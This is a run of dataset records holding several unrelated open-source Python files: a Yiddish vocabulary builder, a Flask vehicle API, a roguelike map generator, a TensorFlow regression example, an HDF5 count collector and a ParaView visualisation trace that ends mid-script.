gdr is not None:\n genders.append(gdr.text.replace(',', '').replace('gender', '').strip())\n else:\n genders.append(None)\n try:\n definitions.append(entr.find('span', 'definition').text)\n except AttributeError:\n definitions.append(None)\n # we sometimes get duplicates for some reason, so we do this to make sure\n # each entry is unique\n definitions = set([(pos, defi, gdr, part, pl, lex) for pos, defi, gdr, part, pl, lex\n in zip(parts_of_speech, definitions, genders,\n participles, plurals, lexemes)])\n ky['definitions'] = [dict(zip(['partOfSpeech', 'text', 'gender', 'participle',\n 'plural', 'lexeme'], word)) for word in definitions]\n return ky\n\n\ndef kentucky_definition(wordlist):\n \"\"\"Get definition for wordlist from Kentucky Yiddish dictionary.\n\n Kentucky Yiddish Dictionary is at\n https://www.cs.uky.edu/~raphael/yiddish/dictionary.cgi. We use selenium to\n get definitions (so chrome / chromium is required and a browser will open\n while grabbing the info).\n\n Parameters\n ----------\n wordlist : dict\n Dictionary whose keys are words to check from Kentucky dictionary.\n Values are ignored.\n\n Returns\n -------\n wordlist : dict\n The input dictionary, with a kentucky entry added (entry is a list of\n dictionaries)\n\n \"\"\"\n dictionary_url = 'https://www.cs.uky.edu/~raphael/yiddish/dictionary.cgi'\n browser = webdriver.Chrome()\n browser.get(dictionary_url)\n for word in wordlist.keys():\n wordlist[word]['kentucky'] = _get_word_from_kentucky(browser, word)\n return wordlist\n\n\ndef initialize_wordlist(text):\n \"\"\"Initialize wordlist.\n\n Convert text of story to the initial wordlist. 
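(A quick sketch: a hypothetical two-word story \"gut morgn\" would yield entries for \"gut\" and \"morgn\" with index lists [0] and [1], respectively.) 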
This returns a dictionary\n whose keys are the words and whose values are dictionaries containing the\n key \"index\" (the list of indices where that word appears in the story),\n plus \"count (story)\" and \"frequency (story)\" entries added before\n returning.\n\n Before extracting the word indices, we strip all newlines, punctuation, and\n digits.\n\n Parameters\n ----------\n text : str\n Single string containing a complete Yiddish story.\n\n Returns\n -------\n wordlist : dict\n Initial wordlist, see above for description.\n\n \"\"\"\n # remove newlines\n text = text.replace('\\n', ' ')\n # remove all punctuation\n punct = string.punctuation + '—“„'\n text = text.translate(str.maketrans(' ', ' ', punct))\n # remove all digits\n text = text.translate(str.maketrans('', '', '0123456789'))\n # split text into words\n text = np.array([t for t in text.split(' ') if t])\n # get the indices for each word\n wordlist = dict([(t, {'index': np.where(text==t)[0].tolist()})\n for t in set(text)])\n for word in wordlist.values():\n word['count (story)'] = len(word['index'])\n word['frequency (story)'] = word['count (story)'] / len(text)\n return wordlist\n\n\ndef main(text, dictionaries=['wiktionary', 'kentucky']):\n \"\"\"Convert Yiddish text to vocabulary list.\n\n Parameters\n ----------\n text : str\n Single string containing a complete Yiddish story.\n dictionaries : list\n Some subset of {'wiktionary', 'kentucky'}. The dictionaries to check.\n\n Returns\n -------\n wordlist : dict\n Vocabulary list, dictionary with Yiddish words as keys.\n\n \"\"\"\n wordlist = initialize_wordlist(text)\n if 'wiktionary' in dictionaries:\n wordlist = wiktionary_definition(wordlist)\n if 'kentucky' in dictionaries:\n wordlist = kentucky_definition(wordlist)\n return wordlist\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Construct vocabulary list based on Yiddish text.\")\n parser.add_argument('input_path', help=\"Path to the story to read in. Should be a .txt or other plaintext file.\")\n parser.add_argument('--output_path', '-o', default=None,\n help=(\"Path to save the vocabulary list at. Should be a json. 
If unset, \"\n \"we save a json with the same name as the input.\"))\n parser.add_argument(\"--dictionaries\", '-d', nargs='+', default=['wiktionary', 'kentucky'],\n choices=['wiktionary', 'kentucky'],\n help=\"Which dictionaries to check for definitions.\")\n args = vars(parser.parse_args())\n output = args.pop('output_path')\n if output is None:\n output = op.splitext(args['input_path'])[0] + '.json'\n elif not output.endswith('json'):\n raise ValueError(\"output_path must end in .json!\")\n with open(args['input_path']) as f:\n text = f.read()\n wordlist = main(text, args['dictionaries'])\n with open(output, 'w') as f:\n json.dump(wordlist, f, ensure_ascii=False)\n","repo_name":"billbrod/yiddish_wordlist","sub_path":"yiddish_wordlist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73311912089","text":"from flask_restful import Resource, reqparse\nfrom Vehiculos.models.vehiculo import VehiculoModel\n\n\nclass Vehiculo(Resource):\n \n parser = reqparse.RequestParser()\n parser.add_argument(\n \n 'marca_vehiculo',\n type= str,\n required = True,\n help = \"Falta la marca_vehiculo\" \n )\n parser.add_argument(\n \n 'modelo_vehiculo',\n type= str,\n required = True,\n help = \"Falta modelo\" \n )\n \n \n def get(self, marca):\n \n # Select * from vehiculo where desc = marca\n # Query.fetchone()\n vehiculo = VehiculoModel.query.filter_by(desc = marca).first()\n if vehiculo:\n return vehiculo.devolverjson()\n \n return {'message' : 'No existe el vehiculo'}, 404\n \n def post(self):\n data = Vehiculo.parser.parse_args()\n vehiculo = VehiculoModel(data['marca_vehiculo'],data['modelo_vehiculo'])\n \n try:\n vehiculo.guardar_en_bd()\n \n except:\n return {'message': 'Hubo un error al guardar en la base de datos'}, 500\n return {'message': 'Se guardo el vehiculo exitosamente', 'vehiculo' : data['marca_vehiculo']}\n # return {'message': 'Se guardo la categoria exitosamente', 'categoria' : data['categoria']}","repo_name":"GuidoTorres/codigo8","sub_path":"Semana8/Vehiculos/controllers/vehiculo.py","file_name":"vehiculo.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20549376129","text":"from collision import Collision\nfrom tools import Rect\nfrom random import randint\n\nMAP_WIDTH = 30\nMAP_HEIGHT = 25\nplayer_x = 2\nplayer_y = 2\n\n\nclass Level_Map:\n def __init__(self, height, width):\n self.width = width\n self.height = height\n self.tiles = self.gen_tiles()\n\n def gen_tiles(self):\n tiles = [[Collision(True) for x in range(self.width)] for y in\n range(self.height)]\n return tiles\n\n def gen_map(self, max_rooms, room_min_size, room_max_size, MAP_WIDTH,\n MAP_HEIGHT, player):\n # room1 = Rect(0, 0, 6, 6)\n # room2 = Rect(8, 8, 6, 6)\n\n # self.make_room(room1)\n # self.make_room(room2)\n rooms = []\n num_rooms = 0\n\n for r in range(max_rooms):\n w = randint(room_min_size, room_max_size)\n h = randint(room_min_size, room_max_size)\n x = randint(0, MAP_WIDTH - w - 1)\n y = randint(0, MAP_HEIGHT - h - 1)\n\n new_room = Rect(x, y, w, h)\n\n for other_room in rooms:\n if new_room.intersect(other_room):\n break\n else:\n self.make_room(new_room)\n (new_x, new_y) = new_room.center()\n if num_rooms == 0:\n player.x = new_x\n player.y = new_y\n else:\n (prev_x, prev_y) = rooms[num_rooms - 1].center()\n if randint(0, 1) == 1:\n self.make_tunnelh(prev_x, new_x, 
prev_y)\n self.make_tunnelv(prev_y, new_y, prev_x)\n else:\n self.make_tunnelv(prev_y, new_y, prev_x)\n self.make_tunnelh(prev_x, new_x, prev_y)\n rooms.append(new_room)\n num_rooms += 1\n\n def make_room(self, room):\n for x in range(room.x1 + 1, room.x2):\n for y in range(room.y1 + 1, room.y2):\n self.tiles[x][y].solid = False\n\n def make_tunnelh(self, x1, x2, y):\n for x in range(min(x1, x2), max(x1, x2) + 1):\n self.tiles[x][y].solid = False\n\n def make_tunnelv(self, y1, y2, x):\n for y in range(min(y1, y2), max(y1, y2) + 1):\n self.tiles[x][y].solid = False\n\n def is_solid(self, x, y):\n if self.tiles[x][y].solid:\n return True\n\n return False\n\n\nlevelmap = Level_Map(MAP_WIDTH, MAP_HEIGHT)\n","repo_name":"0xRainy/raindrops-rl","sub_path":"levelmap.py","file_name":"levelmap.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36885299502","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nimport imports85 # pylint: disable=g-bad-import-order\n\nSTEPS = 5000\nPRICE_NORM_FACTOR = 1000\n\n\ndef main(argv):\n \"\"\"Builds, trains, and evaluates the model.\"\"\"\n assert len(argv) == 1\n (train, test) = imports85.dataset()\n\n # Switch the labels to units of thousands for better convergence.\n def normalize_price(features, labels):\n return features, labels / PRICE_NORM_FACTOR\n\n train = train.map(normalize_price)\n test = test.map(normalize_price)\n\n # Build the training input_fn.\n def input_train():\n return (\n # Shuffling with a buffer larger than the data set ensures\n # that the examples are well mixed.\n train.shuffle(1000).batch(128)\n # Repeat forever\n .repeat())\n\n # Build the validation input_fn.\n def input_test():\n return test.shuffle(1000).batch(128)\n\n # The first way assigns a unique weight to each category. To do this you must\n # specify the category's vocabulary (values outside this specification will\n # receive a weight of zero). Here we specify the vocabulary using a list of\n # options. The vocabulary can also be specified with a vocabulary file (using\n # `categorical_column_with_vocabulary_file`). 
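As a sketch (the file name here is hypothetical, not part of the original example):\n # make_file = tf.feature_column.categorical_column_with_vocabulary_file(\n # key=\"make\", vocabulary_file=\"makes.txt\")\n # 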
For features covering a\n # range of positive integers use `categorical_column_with_identity`.\n body_style_vocab = [\"hardtop\", \"wagon\", \"sedan\", \"hatchback\", \"convertible\"]\n body_style = tf.feature_column.categorical_column_with_vocabulary_list(\n key=\"body-style\", vocabulary_list=body_style_vocab)\n make = tf.feature_column.categorical_column_with_hash_bucket(\n key=\"make\", hash_bucket_size=50)\n\n feature_columns = [\n tf.feature_column.numeric_column(key=\"curb-weight\"),\n tf.feature_column.numeric_column(key=\"highway-mpg\"),\n # Since this is a DNN model, convert categorical columns from sparse\n # to dense.\n # Wrap them in an `indicator_column` to create a\n # one-hot vector from the input.\n tf.feature_column.indicator_column(body_style),\n # Or use an `embedding_column` to create a trainable vector for each\n # index.\n tf.feature_column.embedding_column(make, dimension=3),\n ]\n\n # Build a DNNRegressor, with 2x20-unit hidden layers, with the feature columns\n # defined above as input.\n model = tf.estimator.DNNRegressor(\n hidden_units=[20, 20], feature_columns=feature_columns)\n\n # Train the model.\n model.train(input_fn=input_train, steps=STEPS)\n\n # Evaluate how the model performs on data it has not yet seen.\n eval_result = model.evaluate(input_fn=input_test)\n\n # The evaluation returns a Python dictionary. The \"average_loss\" key holds the\n # Mean Squared Error (MSE).\n average_loss = eval_result[\"average_loss\"]\n\n # Convert MSE to Root Mean Square Error (RMSE).\n print(\"\\n\" + 80 * \"*\")\n print(\"\\nRMS error for the test set: ${:.0f}\"\n .format(PRICE_NORM_FACTOR * average_loss**0.5))\n\n print()\n\n\nif __name__ == \"__main__\":\n # The Estimator periodically generates \"INFO\" logs; make these logs visible.\n tf.logging.set_verbosity(tf.logging.INFO)\n tf.app.run(main=main)\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/examples/get_started/regression/dnn_regression.py","file_name":"dnn_regression.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} +{"seq_id":"72683498328","text":"import sys\nimport os\nimport numpy as np\nimport glob \nimport pdb\nimport gzip\nimport h5py\nimport re\n\nfrom ..utils import hdf5\n\ndef parse_options(argv):\n\n \"\"\"Parses options from the command line \"\"\"\n\n from argparse import ArgumentParser\n\n parser = ArgumentParser(prog='collect_counts',\n description='This script collects expression counts in TSV format and aggregates them in a single HDF5 file. Please note \\\n that there are several ways to provide the list of input files (see options below). You must specify the input \\\n files using one of these options. 
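For example, \"collect_counts -p counts/*.tsv -o all_counts.hdf5\" (file names hypothetical) would aggregate every TSV file matching the pattern into a single HDF5 file. 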
If you specify multiple options, they are parsed in the following precedence: \\\n -i, -f, -p.\\n')\n parser.add_argument('-i', '--input', dest='infiles_fnames', metavar='STR', nargs='+', help='list of expression count files in TSV format', default='-')\n parser.add_argument('-f', '--filelist', dest='infiles_flist', metavar='STR', help='text file listing expression count files', default='-')\n parser.add_argument('-p', '--pattern', dest='infiles_fpattern', metavar='STR', help='search pattern describing list of expression count files', default='-')\n parser.add_argument('-o', '--outfile', dest='outfile', metavar='STR', help='name of output file (will be hdf5)', default='-', required=True)\n parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='switch on verbose output [off]', default=False)\n \n return parser.parse_args(argv[1:])\n\n\ndef main():\n\n options = parse_options(sys.argv)\n\n if options.infiles_fnames != '-':\n files = options.infiles_fnames\n elif options.infiles_flist != '-':\n files = np.loadtxt(options.infiles_flist, dtype='str', delimiter='\\t')\n elif options.infiles_fpattern != '-':\n files = glob.glob(options.infiles_fpattern)\n else:\n sys.stderr.write('ERROR: You need to provide at least one form of input via -i, -f, or -p\\n')\n return 1\n\n OUT = h5py.File(options.outfile, 'w')\n\n counts = []\n header = ['feature']\n labels = []\n for f, fname in enumerate(files):\n if options.verbose:\n print('(%i / %i) Loading %s' % (f + 1, len(files), fname), file=sys.stderr)\n data = np.loadtxt(fname, dtype='str', delimiter='\\t')\n\n #sid = re.sub(r'.tsv$', '', fname.split('/')[-1])\n assert data[0, 0] == 'gene_id', 'ERROR: data has no header!'\n sid = data[0, 1]\n\n if f == 0:\n OUT.create_dataset('sids', data=np.array([sid]).view(np.chararray).encode('utf-8'), dtype='|S128', chunks=True, compression='gzip', maxshape=(None,))\n OUT.create_dataset('gids', data=data[1:, 0].view(np.chararray).encode('utf-8'))\n OUT.create_dataset('counts', data=data[1:, 1][:, np.newaxis].astype('int'), chunks=True, compression='gzip', maxshape=(data.shape[0], None))\n else:\n assert(np.all(OUT['gids'][:].view(np.chararray).decode('utf-8') == data[1:, 0]))\n hdf5.append(OUT, np.array([sid], dtype='|S128'), 'sids')\n hdf5.append(OUT, data[1:, 1].astype('int'), 'counts')\n del data\n OUT.close()\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"ratschlab/gromics","sub_path":"gromics/counting/collect_counts.py","file_name":"collect_counts.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35677422250","text":"#### import the simple module from the paraview\nfrom paraview.simple import *\n#### disable automatic camera reset on 'Show'\nparaview.simple._DisableFirstRenderCameraReset()\n\n# create a new 'OpenFOAMReader'\nswBfoam = OpenFOAMReader(FileName='SwB.foam')\nswBfoam.MeshRegions = ['internalMesh']\nswBfoam.CellArrays = ['CH4Mean', 'CH4Prime2Mean', 'CO2Mean', 'CO2Prime2Mean', 'COMean', 'COPrime2Mean', 'H2Mean', 'H2OMean', 'H2OPrime2Mean', 'H2Prime2Mean', 'N2Mean', 'N2Prime2Mean', 'NOMean', 'NOPrime2Mean', 'O2Mean', 'O2Prime2Mean', 'OHMean', 'OHPrime2Mean', 'T', 'TMean', 'TPrime2Mean', 'U', 'UMean', 'UPrime2Mean', 'Z', 'ZMean', 'ZPrime2Mean', 'alphaSgs', 'chi', 'chiMean', 'chiPrime2Mean', 'muSgs', 'p', 'rho', 'thermo:alpha', 'thermo:mu', 'thermo:psi', 'varZ', 'varZMean', 'varZPrime2Mean']\n\n# get animation scene\nanimationScene1 = 
GetAnimationScene()\n\n# update animation scene based on data timesteps\nanimationScene1.UpdateAnimationUsingDataTimeSteps()\n\n# get active view\nrenderView1 = GetActiveViewOrCreate('RenderView')\n# uncomment following to set a specific view size\nrenderView1.ViewSize = [2199, 1890]\n\n# get color transfer function/color map for 'p'\npLUT = GetColorTransferFunction('p')\npLUT.RGBPoints = [92308.953125, 0.231373, 0.298039, 0.752941, 103047.96875, 0.865003, 0.865003, 0.865003, 113786.984375, 0.705882, 0.0156863, 0.14902]\npLUT.ScalarRangeInitialized = 1.0\n\n# get opacity transfer function/opacity map for 'p'\npPWF = GetOpacityTransferFunction('p')\npPWF.Points = [92308.953125, 0.0, 0.5, 0.0, 113786.984375, 1.0, 0.5, 0.0]\npPWF.ScalarRangeInitialized = 1\n\n# show data in view\nswBfoamDisplay = Show(swBfoam, renderView1)\n# trace defaults for the display properties.\nswBfoamDisplay.Representation = 'Surface'\nswBfoamDisplay.ColorArrayName = ['POINTS', 'p']\nswBfoamDisplay.LookupTable = pLUT\nswBfoamDisplay.OSPRayScaleArray = 'p'\nswBfoamDisplay.OSPRayScaleFunction = 'PiecewiseFunction'\nswBfoamDisplay.SelectOrientationVectors = 'U'\nswBfoamDisplay.ScaleFactor = 0.0760000079870224\nswBfoamDisplay.SelectScaleArray = 'p'\nswBfoamDisplay.GlyphType = 'Arrow'\nswBfoamDisplay.GlyphTableIndexArray = 'p'\nswBfoamDisplay.DataAxesGrid = 'GridAxesRepresentation'\nswBfoamDisplay.PolarAxes = 'PolarAxesRepresentation'\nswBfoamDisplay.ScalarOpacityFunction = pPWF\nswBfoamDisplay.ScalarOpacityUnitDistance = 0.005582608543122148\nswBfoamDisplay.GaussianRadius = 0.0380000039935112\nswBfoamDisplay.SetScaleArray = ['POINTS', 'p']\nswBfoamDisplay.ScaleTransferFunction = 'PiecewiseFunction'\nswBfoamDisplay.OpacityArray = ['POINTS', 'p']\nswBfoamDisplay.OpacityTransferFunction = 'PiecewiseFunction'\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# show color bar/color legend\nswBfoamDisplay.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip1 = Clip(Input=swBfoam)\nclip1.ClipType = 'Plane'\nclip1.Scalars = ['POINTS', 'p']\nclip1.Value = 103047.96875\n\n# init the 'Plane' selected for 'ClipType'\nclip1.ClipType.Origin = [0.0, 0.0, -0.019999995827674866]\n\n# Properties modified on clip1.ClipType\nclip1.ClipType.Origin = [0.0, 0.0, -0.06]\nclip1.ClipType.Normal = [0.0, 0.0, 1.0]\n\n# Properties modified on clip1.ClipType\nclip1.ClipType.Origin = [0.0, 0.0, -0.06]\nclip1.ClipType.Normal = [0.0, 0.0, 1.0]\n\n# show data in view\nclip1Display = Show(clip1, renderView1)\n# trace defaults for the display properties.\nclip1Display.Representation = 'Surface'\nclip1Display.ColorArrayName = ['POINTS', 'p']\nclip1Display.LookupTable = pLUT\nclip1Display.OSPRayScaleArray = 'p'\nclip1Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip1Display.SelectOrientationVectors = 'U'\nclip1Display.ScaleFactor = 0.042000004276633265\nclip1Display.SelectScaleArray = 'p'\nclip1Display.GlyphType = 'Arrow'\nclip1Display.GlyphTableIndexArray = 'p'\nclip1Display.DataAxesGrid = 'GridAxesRepresentation'\nclip1Display.PolarAxes = 'PolarAxesRepresentation'\nclip1Display.ScalarOpacityFunction = pPWF\nclip1Display.ScalarOpacityUnitDistance = 0.004296650276400489\nclip1Display.GaussianRadius = 0.021000002138316633\nclip1Display.SetScaleArray = ['POINTS', 'p']\nclip1Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip1Display.OpacityArray = ['POINTS', 'p']\nclip1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in 
view\nHide(swBfoam, renderView1)\n\n# show color bar/color legend\nclip1Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# reset view to fit data\nrenderView1.ResetCamera()\n\n# create a new 'Clip'\nclip2 = Clip(Input=clip1)\nclip2.ClipType = 'Plane'\nclip2.Scalars = ['POINTS', 'p']\nclip2.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip2.ClipType.Origin = [0.0, 0.0, 0.15000002272427082]\n\n# Properties modified on clip2.ClipType\nclip2.ClipType.Origin = [0.0, 0.0, 0.12]\nclip2.ClipType.Normal = [0.0, 0.0, -1.0]\n\n# Properties modified on clip2.ClipType\nclip2.ClipType.Origin = [0.0, 0.0, 0.12]\nclip2.ClipType.Normal = [0.0, 0.0, -1.0]\n\n# show data in view\nclip2Display = Show(clip2, renderView1)\n# trace defaults for the display properties.\nclip2Display.Representation = 'Surface'\nclip2Display.ColorArrayName = ['POINTS', 'p']\nclip2Display.LookupTable = pLUT\nclip2Display.OSPRayScaleArray = 'p'\nclip2Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip2Display.SelectOrientationVectors = 'U'\nclip2Display.ScaleFactor = 0.02100000083446503\nclip2Display.SelectScaleArray = 'p'\nclip2Display.GlyphType = 'Arrow'\nclip2Display.GlyphTableIndexArray = 'p'\nclip2Display.DataAxesGrid = 'GridAxesRepresentation'\nclip2Display.PolarAxes = 'PolarAxesRepresentation'\nclip2Display.ScalarOpacityFunction = pPWF\nclip2Display.ScalarOpacityUnitDistance = 0.002676453856209217\nclip2Display.GaussianRadius = 0.010500000417232515\nclip2Display.SetScaleArray = ['POINTS', 'p']\nclip2Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip2Display.OpacityArray = ['POINTS', 'p']\nclip2Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip1, renderView1)\n\n# show color bar/color legend\nclip2Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip3 = Clip(Input=clip2)\nclip3.ClipType = 'Plane'\nclip3.Scalars = ['POINTS', 'p']\nclip3.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip3.ClipType.Origin = [0.0, 0.0, 0.029999999329447746]\n\n# Properties modified on clip3.ClipType\nclip3.ClipType.Origin = [0.0, -0.05, 0.029999999329447746]\nclip3.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# Properties modified on clip3.ClipType\nclip3.ClipType.Origin = [0.0, -0.05, 0.029999999329447746]\nclip3.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# show data in view\nclip3Display = Show(clip3, renderView1)\n# trace defaults for the display properties.\nclip3Display.Representation = 'Surface'\nclip3Display.ColorArrayName = ['POINTS', 'p']\nclip3Display.LookupTable = pLUT\nclip3Display.OSPRayScaleArray = 'p'\nclip3Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip3Display.SelectOrientationVectors = 'U'\nclip3Display.ScaleFactor = 0.02100000083446503\nclip3Display.SelectScaleArray = 'p'\nclip3Display.GlyphType = 'Arrow'\nclip3Display.GlyphTableIndexArray = 'p'\nclip3Display.DataAxesGrid = 'GridAxesRepresentation'\nclip3Display.PolarAxes = 'PolarAxesRepresentation'\nclip3Display.ScalarOpacityFunction = pPWF\nclip3Display.ScalarOpacityUnitDistance = 0.002455609039883639\nclip3Display.GaussianRadius = 0.010500000417232515\nclip3Display.SetScaleArray = ['POINTS', 'p']\nclip3Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip3Display.OpacityArray = ['POINTS', 'p']\nclip3Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip2, 
renderView1)\n\n# show color bar/color legend\nclip3Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip4 = Clip(Input=clip3)\nclip4.ClipType = 'Plane'\nclip4.Scalars = ['POINTS', 'p']\nclip4.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip4.ClipType.Origin = [0.0, 0.027500001713633537, 0.029999999329447746]\n\n# Properties modified on clip4.ClipType\nclip4.ClipType.Origin = [0.0, 0.05, 0.029999999329447746]\nclip4.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# Properties modified on clip4.ClipType\nclip4.ClipType.Origin = [0.0, 0.05, 0.029999999329447746]\nclip4.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# show data in view\nclip4Display = Show(clip4, renderView1)\n# trace defaults for the display properties.\nclip4Display.Representation = 'Surface'\nclip4Display.ColorArrayName = ['POINTS', 'p']\nclip4Display.LookupTable = pLUT\nclip4Display.OSPRayScaleArray = 'p'\nclip4Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip4Display.SelectOrientationVectors = 'U'\nclip4Display.ScaleFactor = 0.02100000083446503\nclip4Display.SelectScaleArray = 'p'\nclip4Display.GlyphType = 'Arrow'\nclip4Display.GlyphTableIndexArray = 'p'\nclip4Display.DataAxesGrid = 'GridAxesRepresentation'\nclip4Display.PolarAxes = 'PolarAxesRepresentation'\nclip4Display.ScalarOpacityFunction = pPWF\nclip4Display.ScalarOpacityUnitDistance = 0.0022892767869242786\nclip4Display.GaussianRadius = 0.010500000417232515\nclip4Display.SetScaleArray = ['POINTS', 'p']\nclip4Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip4Display.OpacityArray = ['POINTS', 'p']\nclip4Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip3, renderView1)\n\n# show color bar/color legend\nclip4Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# create a new 'Clip'\nclip5 = Clip(Input=clip4)\nclip5.ClipType = 'Plane'\nclip5.Scalars = ['POINTS', 'p']\nclip5.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip5.ClipType.Origin = [0.0, 0.0, 0.029999999329447746]\n\n# Properties modified on clip5.ClipType\nclip5.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# Properties modified on clip5.ClipType\nclip5.ClipType.Normal = [0.0, 1.0, 0.0]\n\n# show data in view\nclip5Display = Show(clip5, renderView1)\n# trace defaults for the display properties.\nclip5Display.Representation = 'Surface'\nclip5Display.ColorArrayName = ['POINTS', 'p']\nclip5Display.LookupTable = pLUT\nclip5Display.OSPRayScaleArray = 'p'\nclip5Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip5Display.SelectOrientationVectors = 'U'\nclip5Display.ScaleFactor = 0.02100000083446503\nclip5Display.SelectScaleArray = 'p'\nclip5Display.GlyphType = 'Arrow'\nclip5Display.GlyphTableIndexArray = 'p'\nclip5Display.DataAxesGrid = 'GridAxesRepresentation'\nclip5Display.PolarAxes = 'PolarAxesRepresentation'\nclip5Display.ScalarOpacityFunction = pPWF\nclip5Display.ScalarOpacityUnitDistance = 0.0027158731921682337\nclip5Display.GaussianRadius = 0.010500000417232515\nclip5Display.SetScaleArray = ['POINTS', 'p']\nclip5Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip5Display.OpacityArray = ['POINTS', 'p']\nclip5Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip4, renderView1)\n\n# show color bar/color legend\nclip5Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data 
information\nrenderView1.Update()\n\n# create a new 'Slice'\nslice1 = Slice(Input=clip5)\nslice1.SliceType = 'Plane'\nslice1.SliceOffsetValues = [0.0]\n\n# init the 'Plane' selected for 'SliceType'\nslice1.SliceType.Origin = [0.0, 0.02500000037252903, 0.029999999329447746]\n\n# toggle 3D widget visibility (only when running from the GUI)\nHide3DWidgets(proxy=slice1.SliceType)\n\n# show data in view\nslice1Display = Show(slice1, renderView1)\n# trace defaults for the display properties.\nslice1Display.Representation = 'Surface'\nslice1Display.ColorArrayName = ['POINTS', 'p']\nslice1Display.LookupTable = pLUT\nslice1Display.OSPRayScaleArray = 'p'\nslice1Display.OSPRayScaleFunction = 'PiecewiseFunction'\nslice1Display.SelectOrientationVectors = 'U'\nslice1Display.ScaleFactor = 0.01799999959766865\nslice1Display.SelectScaleArray = 'p'\nslice1Display.GlyphType = 'Arrow'\nslice1Display.GlyphTableIndexArray = 'p'\nslice1Display.DataAxesGrid = 'GridAxesRepresentation'\nslice1Display.PolarAxes = 'PolarAxesRepresentation'\nslice1Display.GaussianRadius = 0.008999999798834325\nslice1Display.SetScaleArray = ['POINTS', 'p']\nslice1Display.ScaleTransferFunction = 'PiecewiseFunction'\nslice1Display.OpacityArray = ['POINTS', 'p']\nslice1Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# hide data in view\nHide(clip5, renderView1)\n\n# show color bar/color legend\nslice1Display.SetScalarBarVisibility(renderView1, True)\n\n# update the view to ensure updated data information\nrenderView1.Update()\n\n# set active source\nSetActiveSource(clip4)\n\n# create a new 'Clip'\nclip6 = Clip(Input=clip4)\nclip6.ClipType = 'Plane'\nclip6.Scalars = ['POINTS', 'p']\nclip6.Value = 101426.88671875\n\n# init the 'Plane' selected for 'ClipType'\nclip6.ClipType.Origin = [0.0, 0.0, 0.029999999329447746]\n\n# set active source\nSetActiveSource(clip6)\n\n# show data in view\nclip6Display = Show(clip6, renderView1)\n# trace defaults for the display properties.\nclip6Display.Representation = 'Surface'\nclip6Display.ColorArrayName = ['POINTS', 'p']\nclip6Display.LookupTable = pLUT\nclip6Display.OSPRayScaleArray = 'p'\nclip6Display.OSPRayScaleFunction = 'PiecewiseFunction'\nclip6Display.SelectOrientationVectors = 'U'\nclip6Display.ScaleFactor = 0.01799999959766865\nclip6Display.SelectScaleArray = 'p'\nclip6Display.GlyphType = 'Arrow'\nclip6Display.GlyphTableIndexArray = 'p'\nclip6Display.DataAxesGrid = 'GridAxesRepresentation'\nclip6Display.PolarAxes = 'PolarAxesRepresentation'\nclip6Display.ScalarOpacityFunction = pPWF\nclip6Display.ScalarOpacityUnitDistance = 0.0022417471510480427\nclip6Display.GaussianRadius = 0.008999999798834325\nclip6Display.SetScaleArray = ['POINTS', 'p']\nclip6Display.ScaleTransferFunction = 'PiecewiseFunction'\nclip6Display.OpacityArray = ['POINTS', 'p']\nclip6Display.OpacityTransferFunction = 'PiecewiseFunction'\n\n# show color bar/color legend\nclip6Display.SetScalarBarVisibility(renderView1, True)\n\n# Properties modified on clip6.ClipType\nclip6.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# Properties modified on clip6.ClipType\nclip6.ClipType.Normal = [0.0, -1.0, 0.0]\n\n# show data in view\nclip6Display = Show(clip6, renderView1)\n\n# hide data in view\nHide(clip4, renderView1)\n\n# show color bar/color 